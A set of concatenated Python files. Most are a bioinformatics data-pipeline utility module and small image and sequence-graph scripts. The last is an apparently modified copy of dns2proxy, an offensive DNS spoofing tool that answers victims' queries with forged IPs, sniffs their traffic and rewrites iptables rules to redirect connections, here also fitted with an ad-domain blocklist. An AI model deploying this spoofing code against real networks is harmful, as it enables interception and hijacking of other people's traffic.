return get_instance_id() + "/" + current_process().name
def get_supported_microarray_platforms(
platforms_csv: str = "config/supported_microarray_platforms.csv",
) -> list:
"""
Loads our supported microarray platforms file and returns a list of dictionaries
containing the internal accession, the external accession, and a boolean indicating
whether or not the platform supports brainarray.
CSV must be in the format:
Internal Accession | External Accession | Supports Brainarray
"""
global SUPPORTED_MICROARRAY_PLATFORMS
if SUPPORTED_MICROARRAY_PLATFORMS is not None:
return SUPPORTED_MICROARRAY_PLATFORMS
SUPPORTED_MICROARRAY_PLATFORMS = []
with open(platforms_csv) as platforms_file:
reader = csv.reader(platforms_file)
for line in reader:
# Skip the header row
# Lines are 1 indexed, #BecauseCSV
if reader.line_num == 1:
continue
external_accession = line[1]
is_brainarray = True if line[2] == "y" else False
SUPPORTED_MICROARRAY_PLATFORMS.append(
{
"platform_accession": line[0],
"external_accession": external_accession,
"is_brainarray": is_brainarray,
}
)
# A-GEOD-13158 is the same platform as GPL13158 and this
# pattern is generalizable. Since we don't want to have to
# list a lot of platforms twice just with different prefixes,
# we just convert them and add them to the list.
if external_accession[:6] == "A-GEOD":
converted_accession = external_accession.replace("A-GEOD-", "GPL")
SUPPORTED_MICROARRAY_PLATFORMS.append(
{
"platform_accession": line[0],
"external_accession": converted_accession,
"is_brainarray": is_brainarray,
}
)
# Our list of supported platforms contains both A-GEOD-*
# and GPL*, so convert both ways.
if external_accession[:3] == "GPL":
converted_accession = external_accession.replace("GPL", "A-GEOD-")
SUPPORTED_MICROARRAY_PLATFORMS.append(
{
"platform_accession": line[0],
"external_accession": converted_accession,
"is_brainarray": is_brainarray,
}
)
return SUPPORTED_MICROARRAY_PLATFORMS
def get_supported_rnaseq_platforms(
platforms_list: str = "config/supported_rnaseq_platforms.txt",
) -> list:
"""
Returns a list of RNASeq platforms which are currently supported.
"""
global SUPPORTED_RNASEQ_PLATFORMS
if SUPPORTED_RNASEQ_PLATFORMS is not None:
return SUPPORTED_RNASEQ_PLATFORMS
SUPPORTED_RNASEQ_PLATFORMS = []
with open(platforms_list) as platforms_file:
for line in platforms_file:
SUPPORTED_RNASEQ_PLATFORMS.append(line.strip())
return SUPPORTED_RNASEQ_PLATFORMS
def get_readable_affymetrix_names(
mapping_csv: str = "config/readable_affymetrix_names.csv",
) -> Dict:
"""
Loads the mapping from human readble names to internal accessions for Affymetrix platforms.
CSV must be in the format:
Readable Name | Internal Accession
Returns a dictionary mapping from internal accessions to human readable names.
"""
global READABLE_PLATFORM_NAMES
if READABLE_PLATFORM_NAMES is not None:
return READABLE_PLATFORM_NAMES
READABLE_PLATFORM_NAMES = {}
with open(mapping_csv, encoding="utf-8") as mapping_file:
reader = csv.reader(mapping_file,)
for line in reader:
# Skip the header row
# Lines are 1 indexed, #BecauseCSV
if reader.line_num == 1:
continue
READABLE_PLATFORM_NAMES[line[1]] = line[0]
return READABLE_PLATFORM_NAMES
def get_affymetrix_annotation_package_name_overrides(
overrides_csv: str = "config/affymetrix_annotation_package_name_overrides.csv",
) -> Dict:
"""
Loads the mapping from annotation package name to internal accession for Affymetrix platforms.
CSV must be in the format:
Annotation Package Name | Inernal Accession
"""
global ANNOTATION_PACKAGE_OVERRIDES
if ANNOTATION_PACKAGE_OVERRIDES is not None:
return ANNOTATION_PACKAGE_OVERRIDES
ANNOTATION_PACKAGE_OVERRIDES = {}
with open(overrides_csv, encoding="utf-8") as overrides_file:
reader = csv.reader(overrides_file,)
for line in reader:
# Skip the header row
# Lines are 1 indexed, #BecauseCSV
if reader.line_num == 1:
continue
ANNOTATION_PACKAGE_OVERRIDES[line[1]] = line[0]
return ANNOTATION_PACKAGE_OVERRIDES
def get_internal_microarray_accession(accession_code):
platforms = get_supported_microarray_platforms()
for platform in platforms:
if platform["external_accession"] == accession_code:
return platform["platform_accession"]
elif platform["platform_accession"] == accession_code:
return platform["platform_accession"]
return None
def get_normalized_platform(external_accession):
"""
Handles a weirdo cases, where external_accessions in the format
hugene10stv1 -> hugene10st
"""
matches = re.findall(r"stv\d$", external_accession)
for match in matches:
external_accession = external_accession.replace(match, "st")
return external_accession
def parse_s3_url(url):
"""
Parses S3 URL.
Returns bucket (domain) and file (full path).
"""
bucket = ""
path = ""
if url:
result = urlparse(url)
bucket = result.netloc
path = result.path.strip("/")
return bucket, path
def get_s3_url(s3_bucket: str, s3_key: str) -> str:
"""
Calculates the s3 URL for a file from the bucket name and the file key.
"""
return "%s.s3.amazonaws.com/%s" % (s3_bucket, s3_key)
def calculate_file_size(absolute_file_path):
return os.path.getsize(absolute_file_path)
def calculate_sha1(absolute_file_path):
hash_object = hashlib.sha1()
with open(absolute_file_path, mode="rb") as open_file:
for buf in iter(partial(open_file.read, io.DEFAULT_BUFFER_SIZE), b""):
hash_object.update(buf)
return hash_object.hexdigest()
def calculate_md5(absolute_file_path):
hash_object = hashlib.md5()
with open(absolute_file_path, mode="rb") as open_file:
for buf in iter(partial(open_file.read, io.DEFAULT_BUFFER_SIZE), b""):
hash_object.update(buf)
return hash_object.hexdigest()
def calculate_sha1_and_md5(absolute_file_path):
"""No need to read the file twice if we want both."""
sha1_hash_object = hashlib.sha1()
md5_hash_object = hashlib.md5()
with open(absolute_file_path, mode="rb") as open_file:
for buf in iter(partial(open_file.read, io.DEFAULT_BUFFER_SIZE), b""):
sha1_hash_object.update(buf)
md5_hash_object.update(buf)
return sha1_hash_object.hexdigest(), md5_hash_object.hexdigest()
def get_sra_download_url(run_accession, protocol="fasp"):
"""Try getting the sra-download URL from CGI endpoint"""
# Ex: curl --data "acc=SRR6718414&accept-proto=fasp&version=2.0" \
# https://www.ncbi.nlm.nih.gov/Traces/names/names.cgi
cgi_url = "https://www.ncbi.nlm.nih.gov/Traces/names/names.cgi"
data = "acc=" + run_accession + "&accept-proto=" + protocol + "&version=2.0"
try:
resp = requests.post(cgi_url, data=data)
except Exception:
# Our configured logger needs util, so we use the standard logging library for just this.
import logging
logger = logging.getLogger(__name__)
logger.exception("Bad CGI request!: " + str(cgi_url) + ", " + str(data))
return None
if resp.status_code != 200:
# This isn't on the new servers
return None
else:
try:
# From: '#2.0\nsrapub|DRR002116|2324796808|2013-07-03T05:51:55Z|50964cfc69091cdbf92ea58aaaf0ac1c||fasp://dbtest@sra-download.ncbi.nlm.nih.gov:data/sracloud/traces/dra0/DRR/000002/DRR002116|200|ok\n'
# To: 'dbtest@sra-download.ncbi.nlm.nih.gov:data/sracloud/traces/dra0/DRR/000002/DRR002116'
# Sometimes, the responses from names.cgi makes no sense at all on a per-accession-code basis. This helps us handle that.
# $ curl --data "acc=SRR5818019&accept-proto=fasp&version=2.0" https://www.ncbi.nlm.nih.gov/Traces/names/names.cgi
# 2.0\nremote|SRR5818019|434259775|2017-07-11T21:32:08Z|a4bfc16dbab1d4f729c4552e3c9519d1|||400|Only 'https' protocol is allowed for this object
sra_url = resp.text.split("\n")[1].split("|")[6]
return sra_url
except Exception:
# Our configured logger needs util
# so we use the standard logging library for just this.
import logging
logger = logging.getLogger(__name__)
exception_template = "Error parsing CGI response: {0} {1} {2}"
logger.exception(exception_template.format(str(cgi_url), str(data), str(resp.text)))
return None
def get_fasp_sra_download(run_accession: str):
"""Get an URL for SRA using the FASP protocol.
These URLs should not actually include the protcol."""
full_url = get_sra_download_url(run_accession, "fasp")
if full_url:
sra_url = full_url.split("fasp://")[1]
return sra_url
else:
return None
def get_https_sra_download(run_accession: str):
"""Get an HTTPS URL for SRA."""
return get_sra_download_url(run_accession, "https")
def load_blacklist(blacklist_csv: str = "config/RNASeqRunBlackList.csv"):
""" Loads the SRA run blacklist """
blacklisted_samples = []
with open(blacklist_csv, encoding="utf-8") as blacklist_file:
reader = csv.reader(blacklist_file,)
for line in reader:
# Skip the header row
# Lines are 1 indexed, #BecauseCSV
if reader.line_num == 1:
continue
blacklisted_samples.append(line[0].strip())
return blacklisted_samples
def queryset_page_iterator(queryset, page_size=2000):
""" use the performant paginator to iterate over each page in a queryset """
paginator = PerformantPaginator(queryset, page_size)
page = paginator.page()
while True:
yield page.object_list
if not page.has_next():
break
else:
page = paginator.page(page.next_page_number())
def queryset_iterator(queryset, page_size=2000):
""" use the performant paginator to iterate over a queryset """
for page in queryset_page_iterator(queryset, page_size):
for item in page:
yield item
def download_file(
download_url,
target_file_path,
retry=1,
*,
backoff_factor=8,
max_retries=10,
max_sleep_timeout=120 # 2 mins
):
"""
Downloads the given url into `target_file_path`.
The download will be retried `max_retries` times if it fails for any reason.
We use the exponential backoff https://en.wikipedia.org/wiki/Exponential_backoff
algorithm to add some randomness between retries.
"""
try:
# thanks to https://stackoverflow.com/a/39217788/763705
with requests.get(download_url, stream=True) as r:
with open(target_file_path, "wb") as f:
for chunk in r.iter_content(chunk_size=(4 * 1024 * 1024)):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
except Exception as e:
if retry < max_retries:
# After the retry-th failed attempt, retry downloading after
# k*backoff_factor, where k is a random integer between 0 and 2^retry − 1.
k = random.randint(0, 2 ** retry - 1)
sleep_timeout = min(k * backoff_factor, max_sleep_timeout)
time.sleep(sleep_timeout)
# and retry downloading again
download_file(download_url, target_file_path, retry + 1)
else:
raise e
class FileUtils:
@staticmethod
def is_archive(file_path):
extension = FileUtils.get_extension(file_path)
if not extension:
return False
return extension in [".tar", ".tgz", ".gz", ".zip"]
@staticmethod
def get_filename(file_path):
return os.path.basename(file_path)
@staticmethod
def get_extension(file_path):
if not file_path:
return None
return os.path.splitext(file_path)[1].lower()
|
import cv2
import numpy as np
img = cv2.imread("ferrari.jpg", 0)
row, col = img.shape
M = np.float32([[1, 0, 53], [0, 1, 35]])
dst = cv2.warpAffine(img, M, (row, col))
cv2.imshow("dst", dst)
cv2.waitKey(0)
cv2.destroyAllWindows() |
import networkx as nx
from Bio import SeqIO
G = nx.DiGraph()
seq_DNA = {}
for seq_record in SeqIO.parse("rosalind_grph.txt", "fasta"):
G.add_node(seq_record.id)
seq_DNA[seq_record.id] = str(seq_record.seq)
for i in seq_DNA.keys():
for j in seq_DNA.keys():
if i != j:
if seq_DNA[i][-3:] == seq_DNA[j][:3]:
G.add_edge(i, j)
nx.write_edgelist(G, "edge_list.txt", data=False)
|
#!/usr/bin/python2.6
'''
### SEYED YAHYA NIKOUEI
dns2proxy for offensive cybersecurity v1.0
python dns2proxy.py -h for Usage.
Example:
python2.6 dns2proxy.py -i eth0 -u 192.168.1.101 -d 192.168.1.200
Example for no forwarding (only configured domain based queries and spoofed hosts):
python2.6 dns2proxy.py -i eth0 -noforward
Example for no forwarding but add IPs
python dns2proxy.py -i eth0 -I 192.168.1.101,90.1.1.1,155.54.1.1 -noforward
Author: Leonardo Nve ( leonardo.nve@gmail.com)
'''
import dns.message
import dns.rrset
import dns.resolver
import socket
import numbers
import threading
from struct import *
import datetime
import pcapy
import os
import signal
import errno
from time import sleep
import argparse
consultas = {}
spoof = {}
dominios = {}
transformation = {}
nospoof = []
nospoofto = []
victims = []
LOGREQFILE = "dnslog.txt"
LOGSNIFFFILE = "snifflog.txt"
LOGALERTFILE = "dnsalert.txt"
RESOLVCONF = "resolv.conf"
victim_file = "victims.cfg"
nospoof_file = "nospoof.cfg"
nospoofto_file = "nospoofto.cfg"
specific_file = "spoof.cfg"
dominios_file = "domains.cfg"
transform_file = "transform.cfg"
parser = argparse.ArgumentParser()
parser.add_argument("-N", "--noforward", help="DNS Fowarding OFF (default ON)", action="store_true")
parser.add_argument("-i", "--interface", help="Interface to use", default="eth0")
parser.add_argument("-u", "--ip1", help="First IP to add at the response", default=None)
parser.add_argument("-d", "--ip2", help="Second IP to add at the response", default=None)
parser.add_argument("-I", "--ips", help="List of IPs to add after ip1,ip2 separated with commas", default=None)
parser.add_argument("-S", "--silent", help="Silent mode", action="store_true")
parser.add_argument("-A", "--adminIP", help="Administrator IP for no filtering", default="192.168.0.1")
args = parser.parse_args()
debug = not args.silent
dev = args.interface
adminip = args.adminIP
ip1 = args.ip1
ip2 = args.ip2
Forward = not args.noforward
fake_ips = []
# List of of ips
if args.ips is not None:
for ip in args.ips.split(","):
fake_ips.append(ip)
Resolver = dns.resolver.Resolver()
######################
# GENERAL SECTION #
######################
def save_req(lfile, str):
global realip
global ips
f = open(lfile, "a")
f.write(datetime.datetime.now().strftime( '%Y-%m-%d %H:%M:%S.%f')[:-3] + ' ' + str)
f.close()
def SIGUSR1_handle(signalnum, frame):
global noserv
global Resolver
noserv = 0
DEBUGLOG('Reconfiguring....')
process_files()
Resolver.reset()
Resolver.read_resolv_conf(RESOLVCONF)
return
def process_files():
global nospoof
global spoof
global nospoof_file
global specific_file
global dominios_file
global dominios
global nospoofto_file
global transform_file
for i in nospoof[:]:
nospoof.remove(i)
for i in nospoofto[:]:
nospoofto.remove(i)
for i in victims[:]:
victims.remove(i)
dominios.clear()
spoof.clear()
nsfile = open(nospoof_file, 'r')
for line in nsfile:
if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line
continue
h = line.split()
if len(h) > 0:
DEBUGLOG('Non spoofing ' + h[0])
nospoof.append(h[0])
nsfile.close()
nsfile = open(victim_file, 'r')
for line in nsfile:
if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line
continue
h = line.split()
if len(h) > 0:
DEBUGLOG('Spoofing only to ' + h[0])
victims.append(h[0])
nsfile.close()
nsfile = open(nospoofto_file, 'r')
for line in nsfile:
if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line
continue
h = line.split()
if len(h) > 0:
DEBUGLOG('Non spoofing to ' + h[0])
nospoofto.append(h[0])
nsfile.close()
nsfile = open(specific_file, 'r')
for line in nsfile:
if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line
continue
h = line.split()
if len(h) > 1:
DEBUGLOG('Specific host spoofing ' + h[0] + ' with ' + h[1])
spoof[h[0]] = h[1]
nsfile.close()
nsfile = open(dominios_file, 'r')
for line in nsfile:
if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line
continue
h = line.split()
if len(h) > 1:
DEBUGLOG('Specific domain IP ' + h[0] + ' with ' + h[1])
dominios[h[0]] = h[1]
nsfile.close()
nsfile = open(transform_file, 'r')
for line in nsfile.readlines():
if line.startswith('#'): # instead of line[0] - this way it never throws an exception in an empty line
continue
line = line.rstrip()
from_host = line.split(':')[0]
to_host = line.split(':')[1]
transformation[from_host] = to_host
nsfile.close()
return
def DEBUGLOG(str):
global debug
if debug:
print str
return
def handler_msg(id):
#os.popen('executeScript %s &'%id)
return
######################
# SNIFFER SECTION #
######################
class ThreadSniffer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
#DEBUGLOG( self.getName(), " Sniffer Waiting connections....")
go()
def go():
global ip1
global dev
bpffilter = "dst host %s and not src host %s and !(tcp dst port 80 or tcp dst port 443) and (not host %s)" % (
ip1, ip1, adminip)
cap = pcapy.open_live(dev, 255, 1, 0)
cap.setfilter(bpffilter)
DEBUGLOG( "Starting sniffing in (%s = %s)...." % (dev, ip1))
#start sniffing packets
while True:
try:
(header, packet) = cap.next()
parse_packet(packet)
except:
pass
#DEBUGLOG( ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen())))
#function to parse a packet
def parse_packet(packet):
eth_length = 14
eth_protocol = 8
global ip1
global consultas
global ip2
#Parse IP packets, IP Protocol number = 8
if eth_protocol == 8:
#Parse IP header
#take first 20 characters for the ip header
ip_header = packet[eth_length:20 + eth_length]
#now unpack them :)
iph = unpack('!BBHHHBBH4s4s', ip_header)
version_ihl = iph[0]
#version = version_ihl >> 4
ihl = version_ihl & 0xF
iph_length = ihl * 4
#ttl = iph[5]
protocol = iph[6]
s_addr = socket.inet_ntoa(iph[8])
d_addr = socket.inet_ntoa(iph[9])
#TCP protocol
if protocol == 6:
t = iph_length + eth_length
tcp_header = packet[t:t + 20]
#now unpack them :)
tcph = unpack('!HHLLBBHHH', tcp_header)
source_port = tcph[0]
dest_port = tcph[1]
# sequence = tcph[2]
# acknowledgement = tcph[3]
# doff_reserved = tcph[4]
# tcph_length = doff_reserved >> 4
if consultas.has_key(str(s_addr)):
DEBUGLOG(' ==> Source Address : ' + str(s_addr) + ' * Destination Address : ' + str(d_addr))
DEBUGLOG(' Source Port : ' + str(source_port) + ' * Dest Port : ' + str(dest_port))
# print '>>>> '+str(s_addr)+' esta en la lista!!!!.....'
comando = 'sh ./IPBouncer.sh %s %s %s %s' % (
ip2, str(dest_port), consultas[str(s_addr)], str(dest_port))
os.system(comando)
#print '>>>> ' + comando
comando = '/sbin/iptables -D INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (
ip1, str(dest_port), str(s_addr), str(source_port))
os.system(comando)
comando = '/sbin/iptables -A INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (
ip1, str(dest_port), str(s_addr), str(source_port))
os.system(comando)
#print '>>>> ' + comando
#UDP packets
elif protocol == 17:
u = iph_length + eth_length
#udph_length = 8
#udp_header = packet[u:u + 8]
#now unpack them :)
#udph = unpack('!HHHH', udp_header)
#source_port = udph[0]
#dest_port = udph[1]
#length = udph[2]
#checksum = udph[3]
#DEBUGLOG('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum))
#h_size = eth_length + iph_length + udph_length
#data_size = len(packet) - h_size
#get data from the packet
#data = packet[h_size:]
######################
# DNS SECTION #
######################
def respuestas(name, type):
global Resolver
DEBUGLOG('Query = ' + name + ' ' + type)
string_q = name
try:
black_list = ["partner.googleadservices.com","rubiconproject.com","shop.bbc.com",
"www.googletagservices.com","imp.admarketplace.net","stats.g.doubleclick.net",
"match.adsrvr.org","ak.sail-horizon.com","ads.pubmatic.com","ss.symcd.com",
"static.dynamicyield.com",'adage.com','psaads-d.openx.net','jadserve.postrelease.com'
"ad.insightexpressai.com","securepubads.g.doubleclick.net","amazon-adsystem.com",
"nextadvisor.com",'advertising.bbcworldwide.com','na.ads.yahoo.com','rmx.pxl.ace.advertising.com'
"aimfar.solution.weborama.fr","comet.yahoo.com","geico.d1.sc.omtrdc","ad.doubleclick.net",
"securepubads.g.doubleclick.net",'cmap.ox.ace.advertising.com','match.adsrvr.org'
"pagead2.googlesyndication.com","googleads.g.doubleclick.net","tradex-d.openx.net",
"rapidssl-ocsp.geotrust.com",'pagead2.googlesyndication.com','securepubads.g.doubleclick.net'
"us-east-1.dc.ads.linkedin.com","pixel.advertising.com","ox.ace.advertising.com",
"fei.pro-market.net",'us.adserver.yahoo.com','loadm.exelator.com','load.s3.amazonaws.com'
"adnxs.com","cms.analytics.yahoo.com",'dsum-sec.casalemedia.com','match.adsrvr.org',
'pixel.moatads.com','ads.rubiconproject.com','aax.amazon-adsystem.com',
'image2.pubmatic.com','ads.yahoo.com','s7.addthis.com','www.adweek.com','smartbriefcareers.silkroad.com'
'adaptv.advertising.com','advertising.bbcworldwide.com','nbcudigitaladops.com',
'dbg52463.moatads.com','moatads.com','ad.insightexpressai.com',
'mnet-ad.net','betrad.com','loadm.exelator.com','amazonaws.com','godaddy.com','pubmatic.com',
'ads.linkedin.com','geo.moatads.com','usermatch.krxd.net',
't.co','analytics.twitter.com','ping.chartbeat.net','match.adsrvr.org','a.collective-media.net']
dummy = 0
for site in black_list : # for every name in the black list we are going to compare them to the request
if site in string_q:
dummy = 1 # if the request is in black list then dummy becomes 1 and loop breaks
break
if dummy == 1 : # if the request is in the black list, then we return a fake address to block it
answers = "192.168.000.003"
else : # otherwise if dummy is 0 then the correct address will be sent back
answers = Resolver.query(name, type)
# answers = "192.168.000.003"
except Exception, e:
DEBUGLOG('Exception...')
return 0
return answers
def requestHandler(address, message):
resp = None
dosleep = False
try:
message_id = ord(message[0]) * 256 + ord(message[1])
DEBUGLOG('msg id = ' + str(message_id))
if message_id in serving_ids:
DEBUGLOG('I am already serving this request.')
return
serving_ids.append(message_id)
DEBUGLOG('Client IP: ' + address[0])
prov_ip = address[0]
try:
msg = dns.message.from_wire(message)
try:
op = msg.opcode()
if op == 0:
# standard and inverse query
qs = msg.question
if len(qs) > 0:
q = qs[0]
DEBUGLOG('request is ' + str(q))
string_q = str(q)
black_list = ["partner.googleadservices.com","rubiconproject.com","shop.bbc.com",
"www.googletagservices.com","imp.admarketplace.net","stats.g.doubleclick.net",
"match.adsrvr.org","ak.sail-horizon.com","ads.pubmatic.com","ss.symcd.com",
"static.dynamicyield.com",'adage.com','psaads-d.openx.net','jadserve.postrelease.com'
"ad.insightexpressai.com","securepubads.g.doubleclick.net","amazon-adsystem.com",
"nextadvisor.com",'advertising.bbcworldwide.com','na.ads.yahoo.com','rmx.pxl.ace.advertising.com'
"aimfar.solution.weborama.fr","comet.yahoo.com","geico.d1.sc.omtrdc","ad.doubleclick.net",
"securepubads.g.doubleclick.net",'cmap.ox.ace.advertising.com','match.adsrvr.org'
"pagead2.googlesyndication.com","googleads.g.doubleclick.net","tradex-d.openx.net",
"rapidssl-ocsp.geotrust.com",'pagead2.googlesyndication.com','securepubads.g.doubleclick.net'
"us-east-1.dc.ads.linkedin.com","pixel.advertising.com","ox.ace.advertising.com",
"fei.pro-market.net",'us.adserver.yahoo.com','loadm.exelator.com','load.s3.amazonaws.com'
"adnxs.com","cms.analytics.yahoo.com",'dsum-sec.casalemedia.com','match.adsrvr.org',
'pixel.moatads.com','ads.rubiconproject.com','aax.amazon-adsystem.com',
'image2.pubmatic.com','ads.yahoo.com','s7.addthis.com','www.adweek.com','smartbriefcareers.silkroad.com'
'adaptv.advertising.com','advertising.bbcworldwide.com','nbcudigitaladops.com',
'dbg52463.moatads.com','moatads.com','ad.insightexpressai.com',
'mnet-ad.net','betrad.com','loadm.exelator.com','amazonaws.com','godaddy.com','pubmatic.com',
'ads.linkedin.com','geo.moatads.com','usermatch.krxd.net',
't.co','analytics.twitter.com','ping.chartbeat.net','match.adsrvr.org','a.collective-media.net']
#with open('New Text Document (5).txt', 'r') as file: # reading the text file
#black_list = (file.read()).split("\n")
dummy = 0
for site in black_list : # for every name in the black list we are going to compare them to the request
if site in string_q: # if the request is in black list then dummy becomes 1 and loop breaks
dummy = 1
break
if dummy != 1 : # if the request is not in the black list then we use the following line to save it to dnslog.txt
save_req(LOGREQFILE, 'Client IP: ' + address[0] + ' request is ' + str(q)+"\n")
if q.rdtype == dns.rdatatype.A:
DEBUGLOG('Doing the A query....')
resp, dosleep = std_A_qry(msg, prov_ip)
elif q.rdtype == dns.rdatatype.PTR:
#DEBUGLOG('Doing the PTR query....')
resp = std_PTR_qry(msg)
elif q.rdtype == dns.rdatatype.MX:
DEBUGLOG('Doing the MX query....')
resp = std_MX_qry(msg)
elif q.rdtype == dns.rdatatype.TXT:
#DEBUGLOG('Doing the TXT query....')
resp = std_TXT_qry(msg)
elif q.rdtype == dns.rdatatype.AAAA:
#DEBUGLOG('Doing the AAAA query....')
resp = std_AAAA_qry(msg)
else:
# not implemented
resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented
else:
# not implemented
resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented
except Exception, e:
DEBUGLOG('got ' + repr(e))
resp = make_response(qry=msg, RCODE=2) # RCODE = 2 Server Error
DEBUGLOG('resp = ' + repr(resp.to_wire()))
except Exception, e:
DEBUGLOG('got ' + repr(e))
resp = make_response(id=message_id, RCODE=1) # RCODE = 1 Format Error
DEBUGLOG('resp = ' + repr(resp.to_wire()))
except Exception, e:
# message was crap, not even the ID
DEBUGLOG('got ' + repr(e))
if resp:
s.sendto(resp.to_wire(), address)
if dosleep: sleep(1) # Performance downgrade no tested jet
def std_PTR_qry(msg):
qs = msg.question
DEBUGLOG( str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
resp = make_response(qry=msg)
hosts = respuestas(iparpa[:-1], 'PTR')
if isinstance(hosts, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
DEBUGLOG('Adding ' + host.to_text())
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.PTR, host.to_text())
resp.answer.append(rrset)
return resp
def std_MX_qry(msg):
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
#Temporal disable MX responses
resp = make_response(qry=msg)
hosts = respuestas(iparpa[:-1], 'MX')
if isinstance(hosts, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
DEBUGLOG('Adding ' + host.to_text())
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.MX, host.to_text())
resp.answer.append(rrset)
return resp
def std_TXT_qry(msg):
qs = msg.question
print str(len(qs)) + ' questions.'
iparpa = qs[0].to_text().split(' ', 1)[0]
print 'Host: ' + iparpa
resp = make_response(qry=msg)
host = iparpa[:-1]
punto = host.find(".")
dominio = host[punto:]
host = "."+host
spfresponse = ''
if (dominio in dominios) or (host in dominios):
ttl = 1
DEBUGLOG('Alert domain! (TXT) ID: ' + host)
# Here the HANDLE!
#os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n')
if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host
if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio
DEBUGLOG('Responding with SPF = ' + spfresponse)
rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)
resp.answer.append(rrset)
return resp
hosts = respuestas(iparpa[:-1], 'TXT')
if isinstance(hosts, numbers.Integral):
print 'No host....'
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
print 'Adding ' + host.to_text()
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.TXT, host.to_text())
resp.answer.append(rrset)
return resp
def std_SPF_qry(msg):
qs = msg.question
print str(len(qs)) + ' questions.'
iparpa = qs[0].to_text().split(' ', 1)[0]
print 'Host: ' + iparpa
resp = make_response(qry=msg)
# host = iparpa[:-1]
# punto = host.find(".")
# dominio = host[punto:]
# host = "."+host
# if (dominio in dominios) or (host in dominios):
# ttl = 1
# DEBUGLOG('Alert domain! (TXT) ID: ' + host)
# # Here the HANDLE!
# #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
# save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n')
# if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host
# if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio
# DEBUGLOG('Responding with SPF = ' + spfresponse)
# rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)
# resp.answer.append(rrset)
# return resp
hosts = respuestas(iparpa[:-1], 'SPF')
if isinstance(hosts, numbers.Integral):
print 'No host....'
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
print 'Adding ' + host.to_text()
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.SPF, host.to_text())
resp.answer.append(rrset)
return resp
def std_AAAA_qry(msg):
if not Forward:
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
resp = make_response(qry=msg)
hosts = respuestas(iparpa[:-1], 'AAAA')
if isinstance(hosts, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
DEBUGLOG('Adding ' + host.to_text())
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.AAAA, host.to_text())
resp.answer.append(rrset)
return resp
def std_A_qry(msg, prov_ip):
global consultas
global ip1
global ip2
global fake_ips
dosleep = False
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
resp = make_response(qry=msg)
for q in qs:
qname = q.name.to_text()[:-1]
DEBUGLOG('q name = ' + qname)
host = qname.lower()
dom1 = None
dominio = None
punto1 = host.rfind(".")
punto2 = host.rfind(".",0,punto1-1)
if punto1 > -1:
dom1 = host[punto1:]
if punto2 > -1:
dominio = host[punto2:]
# punto = host.find(".")
# dominio = host[punto:]
if (dominio in dominios) or (dom1 in dominios):
ttl = 1
id = host[:punto2]
if dom1 in dominios:
id = host[:punto1]
dominio = dom1
if not id=='www':
DEBUGLOG('Alert domain! ID: ' + id)
# Here the HANDLE!
#os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
handler_msg(id)
save_req(LOGALERTFILE, 'Alert domain! ID: ' + id + '\n')
DEBUGLOG('Responding with IP = ' + dominios[dominio])
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio])
resp.answer.append(rrset)
return resp, dosleep
if ".%s"%host in dominios:
dominio = ".%s"%host
ttl = 1
DEBUGLOG('Responding with IP = ' + dominios[dominio])
